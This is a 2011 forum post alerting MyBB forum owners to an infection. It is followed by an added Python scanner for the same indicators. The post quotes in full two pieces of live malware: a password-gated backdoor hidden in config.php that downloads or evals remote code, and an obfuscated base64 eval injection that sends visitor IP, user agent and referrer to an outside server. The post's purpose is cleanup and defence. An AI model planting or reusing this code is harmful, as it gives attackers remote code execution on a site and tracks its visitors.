2011-10-15, 05:19 AM
Every infected MyBB forum must check
inc/config.php
After several blank lines there is a malicious script:
if (isset($_GET['pingnow'])&& isset($_GET['pass'])){
    if ($_GET['pass'] == '06f7c042b76e4b04f698c75b7b2777ea'){
        if (($_GET['pingnow']== 'exec')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            $fnm = md5(rand(0,100)).'.php';
            $fp = fopen($fnm, "w");
            curl_setopt($ch, CURLOPT_FILE, $fp);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            curl_exec($ch);
            curl_close($ch);
            fclose($fp);
            echo "<SCRIPT LANGUAGE=\"JavaScript\">location.href='$fnm';</SCRIPT>";
        }
        if (($_GET['pingnow']== 'eval')&&(isset($_GET['file']))){
            $ch = curl_init($_GET['file']);
            curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
            curl_setopt($ch, CURLOPT_HEADER, 0);
            curl_setopt($ch, CURLOPT_TIMEOUT, 5);
            $re = curl_exec($ch);
            curl_close($ch);
            eval($re);
        }
    }
}
I don't know what this script does.
Anyway, please remove it soon.
And again, search for all index.php and showthread.php files on the server to remove the malicious script:
<?php $_F=__FILE__;$_X='Pz48P3BocCAkM3JsID0gJ2h0dHA6Ly85Ni42OWUuYTZlLm8wL2J0LnBocCc7ID8+';eval(base64_decode('JF9YPWJhc2U2NF9kZWNvZGUoJF9YKTskX1g9c3RydHIoJF9YLCcxMjM0NTZhb3VpZScsJ2FvdWllMTIzNDU2Jyk7JF9SPWVyZWdfcmVwbGFjZSgnX19GSUxFX18nLCInIi4kX0YuIiciLCRfWCk7ZXZhbCgkX1IpOyRfUj0wOyRfWD0wOw=='));$ua = urlencode(strtolower($_SERVER['HTTP_USER_AGENT']));$ip = $_SERVER['REMOTE_ADDR'];$host = $_SERVER['HTTP_HOST'];$uri = urlencode($_SERVER['REQUEST_URI']);$ref = urlencode($_SERVER['HTTP_REFERER']);$url = $url.'?ip='.$ip.'&host='.$host.'&uri='.$uri.'&ua='.$ua.'&ref='.$ref; $tmp = file_get_contents($url); echo $tmp; ?>
I know this script is sending our traffic information to the hacker's server, and it is even possible to run more code on our server later through this script
using the "eval" function (so it's dangerous!).
And again, don't forget to change the MySQL and cPanel passwords.
And again, my suggestion is to change the file permission of config.php to 444 (so no one can rewrite the file again).
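
A read-only scan for the indicators described in the post above, as an added example that is not part of the original post. The indicator names, the function names and the threshold of five blank lines are assumptions made for this sketch, and the sample files are constructed, inert fragments.

```python
import os
import re
import tempfile

# Indicators taken from the two snippets quoted in the post.
INDICATORS = {
    "pingnow-backdoor": re.compile(rb"\$_GET\[\s*['\"]pingnow['\"]\s*\]"),
    "eval-base64": re.compile(rb"eval\s*\(\s*base64_decode\s*\(", re.I),
    # "After several blank lines": five or more blank lines is an assumed threshold.
    "code-after-blank-run": re.compile(rb"(?:\r?\n[ \t]*){6,}\S"),
}
TARGETS = {"config.php", "index.php", "showthread.php"}  # files named in the post


def scan_file(path):
    """Return the sorted names of the indicators found in one file."""
    with open(path, "rb") as fh:
        data = fh.read()
    return sorted(name for name, rx in INDICATORS.items() if rx.search(data))


def scan_tree(root, all_php=False):
    """Walk root; check the files named in the post, or every *.php if all_php."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            if fn in TARGETS or (all_php and fn.endswith(".php")):
                full = os.path.join(dirpath, fn)
                found = scan_file(full)
                if found:
                    hits[os.path.relpath(full, root)] = found
    return hits


def demo():
    """Build a constructed tree (inert fragments only) and scan it."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "inc"))
    samples = {  # constructed sample content, not copied from a real forum
        "inc/config.php": b"<?php\n$config['database']['type'] = 'mysqli';\n"
                          + b"\n" * 8 + b"if (isset($_GET['pingnow'])) { }\n",
        "index.php": b"<?php $_X='AAAA';eval(base64_decode('AAAA')); ?>\n",
        "showthread.php": b"<?php\n// clean constructed file\necho 'ok';\n",
    }
    for rel, body in samples.items():
        with open(os.path.join(root, *rel.split("/")), "wb") as fh:
            fh.write(body)
    return scan_tree(root)
```

A hit is a prompt to compare the file against a clean copy from the MyBB release in use, since the blank-line heuristic can also match harmless files.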